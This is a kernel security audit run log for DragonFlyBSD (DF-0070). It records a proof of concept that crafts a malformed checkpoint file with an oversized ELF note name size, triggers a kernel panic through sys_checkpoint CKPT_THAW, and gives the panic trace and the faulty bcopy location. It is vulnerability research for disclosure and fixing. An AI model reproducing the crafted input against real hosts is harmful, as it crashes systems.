DragonFlyBSD Kernel Audit
DF-0070 / run.log
=== DF-0070 run.log (panic mode, RUN 2 -- from fresh `vm.sh reset`) ===
Guest: DragonFly dfbsd 6.5-DEVELOPMENT v6.5.0.1712.g89e6a-DEVELOPMENT (build 2026-06-29) X86_64_GENERIC
Caller: root (kern.ckptgroup=0, wheel-only by default)

Command on guest (root):
    cd /tmp/df70 && (./df0070 evil.ckpt) 2>&1; echo RUN_EXIT=$?

$ ./df0070 evil.ckpt
[*] DF-0070 PoC: building evil.ckpt  (notesz=880, n_namesz=0x10000000, n_descsz=120, mode=panic)
[*] calling sys_checkpoint(CKPT_THAW, fd=3, pid=-1, retval=0) [syscall #467]...
<ssh session terminated: guest kernel panicked -- see panic.txt>

-- vm.sh status after run: down (guest in DDB debugger) --

Panic signature captured from dfbsd-qemu/boot.log:
    panic: assertion "obj != NULL" failed in vm_object_hold_shared at /usr/src/sys/vm/vm_object.c:330
    cpuid = 0
    Trace beginning at frame 0xfffff800aba2d338
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf 
    vm_fault() at vm_fault+0x408 0xffffffff8099d7c8 
    trap_pfault() at trap_pfault+0x9a 0xffffffff80bd49da 
    trap() at trap+0x17c 0xffffffff80bd52dc 
    calltrap() at calltrap+0x9 0xffffffff80b9890a 
    --- trap 000000000000000c, rip = ffffffff80bca038, rsp = fffff800aba2d750, rbp = fffff800aba2d7b8 ---
    memmove() at memmove+0x28 0xffffffff80bca038 
    Debugger("panic")

    CPU0 stopping CPUs: 0x00000002
     stopped
    Stopped at      Debugger+0x7c:  movb    $0,0xbd77f9(%rip)
    db> 

Code offsets in the trace are byte-identical across RUN 1 (pre-reset) and
RUN 2 (post-reset); only the randomised stack-frame base addresses
(0xfffff800ab88b... vs 0xfffff800aba2d...) differ.  Same bug, same path.

trap 0xc  == T_PAGEFLT  (kernel-mode page fault)
memmove+0x28 is the inner bcopy/memmove backing the OOB bcopy at
sys/kern/kern_checkpoint.c:346 in elf_getnote().